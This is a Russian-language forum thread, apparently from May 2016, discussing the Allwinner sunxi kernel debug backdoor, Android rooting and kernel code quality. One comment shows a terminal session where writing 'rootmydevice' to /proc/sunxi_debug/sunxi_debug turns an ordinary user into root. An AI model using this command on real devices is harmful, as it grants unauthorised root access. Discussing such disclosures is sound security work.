| |
| 2.19, Аноним (-), 15:51, 10/05/2016 [^] [^^] [^^^] [ответить]
| +1 +/– |
ru.wikipedia.org
Совет по национальной безопасности (United States National Security Council) — совещательный и координирующий орган при Президенте США.
Национальный совет по контрразведке (National Counterintelligence Board).
Министерство национальной безопасности США.
Центральное разведывательное управление.
Агентство национальной безопасности (США).
Федеральное бюро расследований.
Разведывательное управление министерства обороны США.
Секретная служба США.
Национальное управление военно-космической разведки США.
Бюро разведки и исследований государственного департамента.
и другие (всего 16).
Так же к спецслужбам относятся и другие службы
Агентство по перспективным оборонным научно-исследовательским разработкам США.
| | |
| 2.26, Аноним (-), 17:45, 10/05/2016 [^] [^^] [^^^] [ответить]
| +4 +/– |
Очень полезная функция на андроиде. Или получение рута через недокументированные "уязвимости" путем запуска подозрительных бинарей лучше?
| | |
| |
| 3.34, Eklykti (?), 19:37, 10/05/2016 [^] [^^] [^^^] [ответить]
| +1 +/– |
Угу, только ты ставишь «калькулятор» из маркета, а он получает таким образом рута и ставит тебе уже настоящий бэкдор.
| | |
| |
| 4.35, Crazy Alex (ok), 20:20, 10/05/2016 [^] [^^] [^^^] [ответить]
| +1 +/– |
 Если ты хочешь безопасность на андроиде - какой, к лешему, маркет? Опять же - в принципе можно и бинарный патч наложить после этого. Хотя бы просто строку покорёжить.
| | |
| |
| |
| 6.38, Crazy Alex (ok), 21:48, 10/05/2016 [^] [^^] [^^^] [ответить]
| +/– |
Самый обычный. Если не надо прятаться от спецслужб и прочих врагов, а всего лишь хочется не иметь вирусни - f-droid вместо непонятного софта из маркета и всё будет в порядке.
| | |
|
|
|
|
|
| |
| 2.42, Аноним (-), 23:25, 10/05/2016 [^] [^^] [^^^] [ответить]
| –1 +/– | |
> пойду свой armbian проверю
Не надо всякие бэкдорианы ставить и вендорские ядра. Только майнлайн, только дебиан, только хардкор.
| | |
|
| 1.11, Аноним as anon (?), 14:35, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]
| –3 +/– |
К андроиду данная новость не имеет никакого отношения. Если ни разу не видели что такое банана-пи и прочие линуксовые SOC, то просто переводите исходник новости без собственных пубертатных фантазий.
| | |
| |
| 2.14, p5n (ok), 14:51, 10/05/2016 [^] [^^] [^^^] [ответить]
| +3 +/– |
 Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно не с ангстрём линуксом.
А вообще было бы здорово, если бы все производители BSP для мобильных чипов так делали. А то зарутовать телефон - целая проблема.
| | |
| |
| 3.27, Аноним (-), 17:47, 10/05/2016 [^] [^^] [^^^] [ответить]
| +1 +/– |
> Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно
> не с ангстрём линуксом.
> А вообще было бы здорово, если бы все производители BSP для мобильных
> чипов так делали. А то зарутовать телефон - целая проблема.
Только надо пароль рута потом сразу создавать, т е это должно сразу предлагаться в шелл при первм юзе, а потом отключать дырку.
| | |
| 3.43, Аноним (-), 23:26, 10/05/2016 [^] [^^] [^^^] [ответить]
| +/– | |
> Например cubieboard идёт с прошитым андроидом.
У SD-карты приоритет. А у некоторых allwinner вообще только загрузка с карты и есть.
| | |
|
|
| |
| 2.15, p5n (ok), 14:52, 10/05/2016 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> Может стоит написать в новости кто же этот герой, добавивший бэкдор?
Врядли компания Allwinner это расскажет. Речь о их форке ядра.
| | |
|
| 1.23, Аноним (-), 16:54, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
-bash: /proc/sunxi_debug/sunxi_debug: No such file or directory
$ uname -a
Linux evo 3.4.79-sunxi #2 SMP PREEMPT Sun Jul 13 20:36:39 EEST 2014 armv7l GNU/Linux
| | |
| |
| |
| 3.28, anonymous (??), 18:25, 10/05/2016 [^] [^^] [^^^] [ответить]
| +/– | |
sun8i - это armv7
orangepi@OrangePI:~$ uname -a
Linux OrangePI 3.4.39 #2 SMP PREEMPT Mon Oct 12 12:03:03 CEST 2015 armv7l GNU/Linux
orangepi@OrangePI:~$ id
uid=1000(orangepi) gid=1000(orangepi) groups=1000(orangepi),27(sudo)
orangepi@OrangePI:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
orangepi@OrangePI:~$ id
uid=0(root) gid=0(root) groups=0(root),27(sudo),1000(orangepi)
| | |
|
|
| |
| 2.44, Аноним (-), 23:28, 10/05/2016 [^] [^^] [^^^] [ответить]
| –1 +/– | |
> тот самый случай, когда proc не в прок
Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено в системе?
| | |
| |
| 3.54, Аноним (-), 23:38, 11/05/2016 [^] [^^] [^^^] [ответить]
| +/– |
>> тот самый случай, когда proc не в прок
> Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено
> в системе?
Ныхрены это смотреть на _отлаженной_ системе?
| | |
|
|
| 1.29, anonimus (?), 18:27, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]
| +4 +/– | |
Строка 'cred->euid = 0;' написана 2 раза
Надо челу, рекламирующиему статический анализатор с блюющим единорогом, проверить алвинеровские бекдоры и запилить статью на хабр с объяснениями как испраить баги и ссылкой на англоязычный перевод.
| | |
| |
| 2.30, тоже Аноним (ok), 18:35, 10/05/2016 [^] [^^] [^^^] [ответить]
| +1 +/– |
 Если их статический анализатор начнет еще и бэкдоры выявлять, имиджевому единорогу придется не только блевать радугой, но и какать бабочками.
Но пока, насколько мне известно, ему это не грозит.
| | |
| |
| 3.32, anonimus (?), 18:44, 10/05/2016 [^] [^^] [^^^] [ответить]
| +/– |
Не выявлять бекдоры, а хотя бы писать их так, чтобы они во время своей паразитной работы не гробили систему. Очень печально, когда подобная гадость портит тебе жизнь. Учитывая, что столько косяков в 10 строчках и учитывая, что код работает в режиме ядра, очень стремно становится от мысли, что же там творится в более сложном коде.
| | |
|
| 2.31, anonimus (?), 18:38, 10/05/2016 [^] [^^] [^^^] [ответить]
| –1 +/– |
да и код сравнения строк с strncmp написан неаккуратненько. Надо бы сначала убедиться что count >= 12 (еще лучше, просто == 12) и лишь затем вызывать strncmp(..., 12)
| | |
| |
| 3.51, alex (??), 17:37, 11/05/2016 [^] [^^] [^^^] [ответить]
| +/– |
count - это типа сначала длину строки в буфере проверить?
дак сравнение точно также пройдётся по нему
проблема может возникнуть только если буфер меньше 12+1 байт и при этом в нём нет нулевого байта, но тогда и длину не получится определить корректно.
| | |
|
|
| |
| 2.45, Аноним (-), 23:57, 10/05/2016 [^] [^^] [^^^] [ответить]
| +/– |
>> предлагаемое компанией Allwinner
> к перцам нужно внимательней относиться)
У них там все драйверы такие. Где дебаг, где просто баг. Пользуйтесь майнлайном.
| | |
|
| 1.48, IZh. (?), 11:56, 11/05/2016 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
> cred->uid = 0;
> ...
А RCU для кого писано?
Вот тут точно статические анализаторы могли бы warning выдавать.
| | |
| 1.52, Аноним (-), 17:50, 11/05/2016 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Э "Бэкдор позиционируется как отладочный ре" типа уже позиционируется малварь легальный можно писать и грабить что ле?
| | |
| |
| 2.55, Аноним (-), 23:39, 11/05/2016 [^] [^^] [^^^] [ответить]
| +/– | |
> такая спокойная беседа о бэкдоре
Так они повсюду. Чтобы не понтоваться - надо выкинуть девайся и к староверам, в тайгу. А так, мыши, конечно, плакали, кололись - но фуле делать, социальность обезьяньего стада не истребить ничем! :)
| | |
|
|
